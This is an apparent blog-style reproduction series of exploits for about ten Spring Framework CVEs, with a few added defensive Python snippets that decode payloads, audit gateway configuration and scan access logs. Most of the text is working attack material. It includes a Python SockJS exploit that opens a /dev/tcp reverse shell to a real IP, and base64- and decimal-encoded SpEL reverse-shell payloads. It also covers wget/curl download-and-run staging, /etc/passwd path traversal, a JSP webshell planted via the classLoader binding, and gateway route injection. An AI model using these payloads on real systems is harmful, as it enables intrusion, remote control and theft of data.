Spring vulnerability reproduction series

Spring WebSocket RCE (CVE-2018-1270)

Affected versions: Spring Framework 4.3 - 4.3.15, Spring Framework 5.0 - 5.0.5

Vulnerability fingerprint

url/gs-guide-websocket
exp:


import requests
import random
import string
import time
import threading
import logging
import sys
import json

logging.basicConfig(stream=sys.stdout, level=logging.INFO)

def random_str(length):
    letters = string.ascii_lowercase + string.digits
    return ''.join(random.choice(letters) for c in range(length))


class SockJS(threading.Thread):
    def __init__(self, url, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'
        self.daemon = True
        self.session = requests.session()
        self.session.headers = {
            'Referer': url,
            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
        }
        self.t = int(time.time()*1000)

    def run(self):
        url = f'{self.base}/htmlfile?c=_jp.vulhub'
        response = self.session.get(url, stream=True)
        for line in response.iter_lines():
            time.sleep(0.5)

    def send(self, command, headers, body=''):
        data = [command.upper(), '\n']

        data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()]))

        data.append('\n\n')
        data.append(body)
        data.append('\x00')
        data = json.dumps([''.join(data)])

        response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)
        if response.status_code != 204:
            logging.info(f"send '{command}' data error.")
        else:
            logging.info(f"send '{command}' data success.")

    def __del__(self):
        self.session.close()


sockjs = SockJS('http://8.130.100.154:8080/gs-guide-websocket')
sockjs.start()
time.sleep(1)

sockjs.send('connect', {
    'accept-version': '1.1,1.0',
    'heart-beat': '10000,10000'
})
sockjs.send('subscribe', {
    'selector': 'T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/bash","-c",'
                '"exec 5<>/dev/tcp/8.130.100.154/80;cat <&5 | while read line; do $line 2>&5 >&5; done"})',
    'id': 'sub-0',
    'destination': '/topic/greetings'
})

data = json.dumps({'name': 'vulhub'})
sockjs.send('send', {
    'content-length': len(data),
    'destination': '/app/hello'
}, data)


Spring Data RCE(CVE-2018-1273)

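Affected versions: Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10), Spring Data REST 2.6 - 2.6.10 (Ingalls SR10), Spring Data Commons 2.0 to 2.0.5 (Kay SR5), Spring Data REST 3.0 - 3.0.5 (Kay SR5)

Vulnerability fingerprint

Not very obvious; it may be present wherever the Spring framework interacts with a database (for example, a form).

Reproduction

There is nothing much on the main page.
A directory scanner finds the /users directory; visit it.
Enter anything and capture the request.

Modify it.
Test with dnslog first.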

POST:

POST /users?page=&size=5 HTTP/1.1
Host: 8.130.100.1xx:8080
Content-Length: 127
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Origin: http://8.130.100.154:8080
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://8.130.100.154:8080/users?page=&size=5
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: gosession=MTY5OTg3OTkyMHxEWDhFQVFMX2dBQUJFQUVRQUFCQV80QUFBUVp6ZEhKcGJtY01CQUFDYVdRR2MzUnlhVzVuRENZQUpEUTFOR00zTmpJMUxUVTROalF0TkdFd1pDMWhOams0TFRRMVptRXhNakEwTjJSa1lRPT18PRHNBt47aG28oC6jqqZpQ79n0DnHBAy1NITTlRpY=
Connection: close

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping 9r6b8g.dnslog.cn")]=&password=&repeatedPassword=

Next, start a reverse shell.
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjEzMC4xMDAuMTU0LzgwIDA+JjE=}|{base64 -d}|{bash -i}")]=&password=&repeatedPassword=

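This did not succeed, and I don't know what went wrong.
On to the next method:

Put a shell script on your own server, then start an HTTP service so the victim can fetch it.
Server:
1. Create a shell script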

exp.sh
bash -i >& /dev/tcp/8.130.xxx.1x4/80 0>&1

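2. Start the HTTP service

python -m http.server

3 (optional). Have the target download the file into the /tmp directory. (Other directories may require granting permissions, which is more trouble.)

wget http://x.x.xx.x/exp.sh

4. The target uses curl to write exp.sh into the /tmp directory.

curl -o /tmp/exp.sh http://8.xxx.xxx.xx4:8000/exp.sh

5. Then the target runs the shell file

bash /tmp/exp.sh

Connected successfully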

Spring Data REST RCE(CVE-2017-8046)

Affected versions:

Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3

Spring Boot version < 2.0.0M4

Spring Data release trains < Kay-RC3

Vulnerability fingerprint

{
  "_links" : {
    "customers" : {
      "href" : "http://x.x.x.x:8080/customers"
    },
    "profile" : {
      "href" : "http://x.x.x.x:8080/profile"
    }
  }
}

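A JSON-formatted response indicates that this is a RESTful-style API server.
The fingerprint is that the pages are entirely JSON, with some classes in them.

Reproduction

Visiting /customers/1 matches the vulnerability fingerprint.

The PATCH value is a SpEL expression. Add the request header Content-Type: application/json-patch+json, and the command must be converted to decimal encoding.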

PATCH /customers/1 HTTP/1.1
Host: 8.130.100.154:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: gosession=MTY5OTg3OTkyMHxEWDhFQVFMX2dBQUJFQUVRQUFCQV80QUFBUVp6ZEhKcGJtY01CQUFDYVdRR2MzUnlhVzVuRENZQUpEUTFOR00zTmpJMUxUVTROalF0TkdFd1pDMWhOams0TFRRMVptRXhNakEwTjJSa1lRPT18P_GIRHNBt47aG28oC6jqqZpQ79n0DnHBAy1NITTlRpY=
If-None-Match: "0"
If-Modified-Since: Tue, 21 Nov 2023 13:09:48 GMT
Content-Type: application/json-patch+json
Connection: close
Content-Length: 468

[
  { "op": "replace", 
    "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,52,76,106,69,122,77,67,52,120,77,68,65,117,77,84,85,48,76,122,103,119,73,68,65,43,74,106,69,61,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125}))/lastname",
    "value": "exploit" 
  }
]

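The decimal values here are bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjEzMC4xMDAuMTU0LzgwIDA+JjE=}|{base64,-d}|{bash,-i}

Then listen on the port on the server, and send the request above to the target with bp (Burp Suite).
The reverse shell succeeded.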

Spring Web Flow RCE(CVE-2017-4971)

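Affected versions
Spring Web Flow 2.4.0 - 2.4.4
Detailed vulnerability analysis: "Spring Web Flow remote code execution vulnerability analysis (CVE-2017-4971)"

Vulnerability fingerprint

No obvious fingerprint; try it wherever forms are submitted.

Exploitation conditions

  • 1. The useSpringBeanBinding parameter of the MvcViewFactoryCreator object must be set to false (the default)
  • 2. The BinderConfiguration object in the flow view object is set to empty

Reproduction

Log in with any account; the usernames and passwords are already provided.
After logging in, enter any room.
Then click Book Hotel.
Fill in the information with anything.
Click confirm, and remember to turn on request interception at this point: there is a CSRF token restriction here, so replaying the request is useless.
Test with dnslog first.

Reverse shell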

_eventId_confirm=&_csrf=eed53409-7b2a-4b0e-b00b-27e6beb51aeb&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/8.130.100.154/80+0>%261")).start()=vulhub
(Remember to URL-encode it like this; otherwise the reverse shell fails. I have already tried...)

Spring Security OAuth2 RCE(CVE-2016-4977)

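Affected versions:
Spring Security OAuth 2.0 - 2.0.9
Spring Security OAuth 1.0 - 1.0.5

Vulnerability fingerprint

Visit

/oauth/authorize?response_type=${2*2}&client_id=acme&scope=openid&redirect_uri=http://test

A login page is present.
Default credentials: admin/admin
Then this page is returned,
which indicates the vulnerability is present.
Payload generation script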

#!/usr/bin/env python

message = input('Enter message to encode:')

poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])

for ch in message[1:]:
   poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch) 

poc += ')}'

print(poc)

Copy the result and splice it in here
oauth/authorize?response_type=${POC}&client_id=acme&scope=openid&redirect_uri=http://test
No output is echoed back.

Try a reverse shell
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjEzMC4xMDAuMTU0LzgwIDA+JjE=}|{base64,-d}|{bash,-i}
Listen on the port on the server

nc -lvnp 80

payload

http://8.130.100.154:8080/oauth/authorize?response_type=${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(98).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(70)).concat(T(java.lang.Character).toString(122)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(83)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(43)).concat(T(java.lang.Character).toString(74)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(118)).concat(T(java.lang.Character).toString(90)).concat(T(java.lang.Character).toString(71)).concat(T(java.lang.Character).toString(86)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(51)).concat(T(java.lang.Character).toString(82)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(56)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(76)).concat(
T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(69)).concat(T(java.lang.Character).toString(122)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(68)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(85)).concat(T(java.lang.Character).toString(48)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(122)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(73)).concat(T(java.lang.Character).toString(68)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(43)).concat(T(java.lang.Character).toString(74)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(69)).concat(T(java.lang.Character).toString(61)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(54)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(
java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(125)))}&client_id=acme&scope=openid&redirect_uri=http://test

Reverse shell succeeded
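
For triage of captured traffic, the two encodings used above (the decimal byte array in the CVE-2017-8046 JSON Patch path and the Character.toString().concat() chain in the CVE-2016-4977 URL) can be decoded back to the command they hide. This is an added example, not code from the original post; the function names and both sample requests are constructed for illustration.

```python
import re
from urllib.parse import unquote

# `new byte[]{98,97,...}` literal, as in the JSON Patch "path" (CVE-2017-8046)
BYTE_ARRAY = re.compile(r"new\s+byte\s*\[\s*\]\s*\{\s*(-?\d+(?:\s*,\s*-?\d+)*)\s*\}")
# One `T(java.lang.Character).toString(98)` link of a .concat() chain (CVE-2016-4977)
CHAR_CALL = re.compile(r"T\(\s*java\.lang\.Character\)\.toString\((\d{1,6})\)")
# Text allowed between two links of the same chain: `.concat(` or `).concat(`
GLUE = re.compile(r"[\s)]*\.concat\(\s*")


def decode_byte_arrays(text):
    """Return the string hidden in each Java byte-array literal."""
    decoded = []
    for match in BYTE_ARRAY.finditer(text):
        # Java bytes are signed, so -28 stands for 0xE4.
        values = [int(v) & 0xFF for v in match.group(1).split(",")]
        decoded.append(bytes(values).decode("utf-8", errors="replace"))
    return decoded


def decode_char_chains(text):
    """Join consecutive Character.toString(n) calls into the string they build."""
    chains, current, last_end = [], [], 0
    for match in CHAR_CALL.finditer(text):
        # A gap that is not pure .concat( glue starts a new chain.
        if current and not GLUE.fullmatch(text, last_end, match.start()):
            chains.append("".join(current))
            current = []
        current.append(chr(int(match.group(1))))
        last_end = match.end()
    if current:
        chains.append("".join(current))
    return chains


def triage(captured):
    """URL-decode a captured request fragment and list what each encoding hides."""
    text = unquote(captured)
    found = [("byte-array", s) for s in decode_byte_arrays(text)]
    found += [("char-chain", s) for s in decode_char_chains(text)]
    return found


# Constructed samples: same shape as the requests above, harmless command strings.
SAMPLE_PATCH_BODY = (
    '[{"op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec('
    'new java.lang.String(new byte[]{119,104,111,97,109,105}))/lastname", "value": "x"}]'
)
SAMPLE_AUTHORIZE_URL = (
    "/oauth/authorize?response_type=$%7BT(java.lang.Runtime).getRuntime().exec("
    "T(java.lang.Character).toString(105).concat(T(java.lang.Character).toString(100))"
    ")%7D&client_id=acme"
)

if __name__ == "__main__":
    for sample in (SAMPLE_PATCH_BODY, SAMPLE_AUTHORIZE_URL):
        print(triage(sample))
```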

Spring Boot directory traversal (CVE-2021-21234)

Affected versions: spring boot actuator logview < 0.2.13

Vulnerability fingerprint

The home page shows ok
or the home page shows Hellow Spring Boot

Reproduction

#Windows
{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../

#Windows
{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../

#Linux
{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../

#Linux
{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../


Spring Data MongoDB SpEL Expression injection(CVE-2022-22980)

Affected versions:
Spring Data MongoDB == 3.4.0
3.3.0 <= Spring Data MongoDB <= 3.3.4

Vulnerability fingerprint

No obvious fingerprint; if the spring + mongodb combination is present, it can be tried blind.

Reproduction

name=T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('ls')

Spring Framework RCE(CVE-2022-22965)

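Affected versions:
JDK 9+ & Spring and its derived frameworks & Spring project deployed with Tomcat & POJO parameter binding in use & (Spring Framework 5.3.x - 5.3.18 | Spring Framework 2.x - 5.2.20)

Vulnerability fingerprint

No obvious fingerprint; when a site is identified as Spring + Java, it can be tried blind.

Reproduction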


class.module.classLoader.resources.context.parent.pipeline.first.pattern=
Content of the file to be created

class.module.classLoader.resources.context.parent.pipeline.first.suffix=
Changes the suffix of the Tomcat log file

class.module.classLoader.resources.context.parent.pipeline.first.directory=
Web root directory the file is written to

class.module.classLoader.resources.context.parent.pipeline.first.prefix=
Name of the file to write

class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
File date format (in practice, just set it to an empty value)

These can be sent one at a time with GET, or all at once with POST. With GET, a result like the one below means the payload succeeded.

Sending with GET

class.module.classLoader.resources.context.parent.pipeline.first.pattern=spring
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

http://8.130.100.154:8080/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=spring&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
Finally, visit shell.jsp

Writing the shell

Webshell before URL encoding:
%{c2}i if("t".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i

Webshell after URL encoding:
%25%7Bc2%7Di%20if(%22t%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di

So now the content of shell.jsp only needs to be replaced with the following

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22t%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di

The request also needs three additional headers

suffix:%>//
c1:Runtime
c2:<%


Spring Cloud Function RCE(CVE-2022-22963)

Affected versions:
3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

Fingerprint

/functionRouter

Reproduction

Access /functionRouter with a POST request and place the payload in a request header
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjEzMC4xMDAuMTU0LzgwIDA+JjE=}|{base64,-d}|{bash,-i}")
Then listen on the port on the server and send the request; the reverse shell succeeds

Spring Cloud Gateway RCE(CVE-2022-22947)

This vulnerability has two preconditions

  • management.endpoint.gateway.enabled: true
  • management.endpoints.web.exposure.include: gateway
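
To check whether a deployment meets these two preconditions, its application.yml or application.properties can be audited offline. This is an added example, not code from the original post or from Spring; the function names and both sample configurations are constructed, and it assumes an unset enabled key counts as enabled and that a "*" include or a matching exclude entry changes exposure.

```python
import re

KEY_VALUE = re.compile(r"^(\s*)([^\s:=#-][^:=]*?)\s*[:=]\s*(.*)$")
LIST_ITEM = re.compile(r"^\s*-\s+(.+)$")
EXPOSURE = "management.endpoints.web.exposure."


def flatten(text):
    """Flatten .properties lines or simple nested YAML into {dotted.key: value}."""
    flat, stack = {}, []  # stack holds (indent, key) of YAML mappings still open
    for raw in text.splitlines():
        item, pair = LIST_ITEM.match(raw), KEY_VALUE.match(raw)
        if item and stack:  # block-style list entry belongs to the open key
            parent = ".".join(key for _, key in stack)
            flat[parent] = ",".join(filter(None, [flat.get(parent), item.group(1)]))
        elif pair:
            indent, key = len(pair.group(1)), pair.group(2)
            value = re.sub(r"(^|\s)#.*$", "", pair.group(3)).strip()
            while stack and stack[-1][0] >= indent:
                stack.pop()
            if value:
                flat[".".join([k for _, k in stack] + [key])] = value
            else:
                stack.append((indent, key))
    return flat


def ids(value):  # 'a, b', '[a, b]' or '"*"' -> set of lower-case endpoint ids
    return {v.strip(" []\"'").lower() for v in value.split(",")} - {""}


def audit_gateway_actuator(config_text):
    """Evaluate the two preconditions for one application.yml / .properties text."""
    cfg = flatten(config_text)
    # Assumption: an unset `enabled` key counts as enabled (documented default).
    enabled = cfg.get("management.endpoint.gateway.enabled", "true").strip("\"'").lower() != "false"
    include = ids(cfg.get(EXPOSURE + "include", ""))
    exclude = ids(cfg.get(EXPOSURE + "exclude", ""))
    exposed = bool(include & {"gateway", "*"}) and not exclude & {"gateway", "*"}
    return {"enabled": enabled, "exposed": exposed, "at_risk": enabled and exposed}


# Constructed samples: a configuration meeting both preconditions, and a hardened one.
WEAK_YAML = """\
management:
  endpoint:
    gateway:
      enabled: true
  endpoints:
    web:
      exposure:
        include:
          - health
          - gateway
"""
HARDENED_PROPERTIES = (
    "management.endpoint.gateway.enabled=false\n"
    "management.endpoints.web.exposure.include=health,info\n"
)
```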

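Affected versions
Spring Cloud Gateway 3.1.0, Spring Cloud Gateway 3.0.0 - 3.0.6; older unsupported versions are also affected

Fingerprint

First, an introduction to the actuator endpoints of Spring Cloud Gateway

  • List all routes: GET request: http://localhost:xxxx/actuator/gateway/routes/

  • Add a route: POST request: http://localhost:xxxx/actuator/gateway/routes/{route id}

  • Delete a route: DELETE request: http://localhost:xxxx/actuator/gateway/routes/{route id}

  • Get a specific route: GET request: http://localhost:xxxx/actuator/gateway/routes/{route id}

  • Refresh routes: POST request: http://localhost:xxxx/actuator/gateway/refresh

When the add-route endpoint is called, filters can be added to the route. A filter value may be a SpEL expression, and that expression is evaluated, so a crafted SpEL expression yields remote command execution. The crafted filter can use the gateway's built-in AddResponseHeader to put the result of the SpEL evaluation into a response header, where it can be read directly.

So the fingerprint is clear --> /actuator/gateway

Reproduction

The exploitation flow is: add a route --> trigger the payload --> view the result. At its core this is SpEL expression injection; insert the expression at the value field when adding the route.

Add the route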

POST /actuator/gateway/routes/milu HTTP/1.1
Host:x.x.x.x:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

The name in filters here can be changed to any of the following

# Filter usage documentation
https://docs.spring.io/spring-cloud-gateway/docs/current/reference/html/#the-addrequestheader-gatewayfilter-factory

AddRequestHeader
MapRequestHeader
AddRequestParameter
AddResponseHeader
ModifyRequestBody
DedupeResponseHeader
ModifyResponseBody
CacheRequestBody
PrefixPath
PreserveHostHeader
RedirectTo
RemoveRequestHeader
RemoveRequestParameter
RemoveResponseHeader
RewritePath
Retry
SetPath
SecureHeaders
SetRequestHeader
SetRequestHostHeader
RewriteResponseHeader
RewriteLocationResponseHeader
SetStatus
SaveSession
StripPrefix
RequestHeaderToRequestUri
RequestSize
RequestHeaderSize

Trigger the payload

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

View the result

Visit --> /actuator/gateway/routes/milu

Delete the route


DELETE /actuator/gateway/routes/milu HTTP/1.1
Host: 192.168.32.130:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close

Refresh the routes


POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.32.130:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
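
The request shapes reproduced on this page leave traces in web access logs, and the sketch below flags them. It is an added example, not code from the original post; the rule names and log lines are constructed, and because access logs carry no headers or bodies, the CVE-2022-22963 header and the POST-body payloads show up only as hits on the endpoint path.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Common Log Format prefix: client, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
CLASSLOADER_PARAM = re.compile(r"class\.(module\.)?classloader\.", re.I)
SPEL_TYPE_REF = re.compile(r"T\(\s*java\.lang\.|getRuntime\(\)")


def classify(method, target):
    """Return the rule names tripped by one request line."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    hits = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):  # percent-decodes
        if CLASSLOADER_PARAM.match(name):
            hits.add("CVE-2022-22965 classLoader property binding")
        if SPEL_TYPE_REF.search(name) or SPEL_TYPE_REF.search(value):
            hits.add("SpEL type reference in query parameter")
        if name == "base" and ".." in value and path.endswith("/log/view"):
            hits.add("CVE-2021-21234 logview traversal")
    if method in ("POST", "DELETE") and path.startswith("/actuator/gateway/"):
        hits.add("gateway actuator route change")
    if method == "POST" and path.startswith("/functionRouter"):
        hits.add("POST to /functionRouter")
    return hits


def scan(lines):
    """Return (client_ip, status, sorted rule names) for each suspicious log line."""
    results = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line in the expected format
        hits = classify(m["method"], m["target"])
        if hits:
            results.append((m["ip"], int(m["status"]), sorted(hits)))
    return results


# Constructed access-log lines (documentation IP ranges, harmless values).
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Nov/2023:13:09:48 +0000] "GET /?class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp HTTP/1.1" 200 12',
    '203.0.113.7 - - [21/Nov/2023:13:10:02 +0000] "GET /manage/log/view?filename=/etc/passwd&base=../../../../ HTTP/1.1" 200 1873',
    '203.0.113.9 - - [21/Nov/2023:13:11:15 +0000] "GET /oauth/authorize?response_type=$%7BT(java.lang.Character).toString(105)%7D&client_id=acme HTTP/1.1" 500 310',
    '203.0.113.9 - - [21/Nov/2023:13:12:40 +0000] "POST /actuator/gateway/routes/milu HTTP/1.1" 201 0',
    '198.51.100.4 - - [21/Nov/2023:13:13:00 +0000] "GET /actuator/gateway/routes HTTP/1.1" 200 512',
    '198.51.100.4 - - [21/Nov/2023:13:13:05 +0000] "GET /users?page=&size=5 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```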


Reference article: "Understanding, identifying and mastering all Spring vulnerabilities from scratch" (从0认识+识别+掌握spring全漏洞(1.8w字超详细看完拿捏spring))
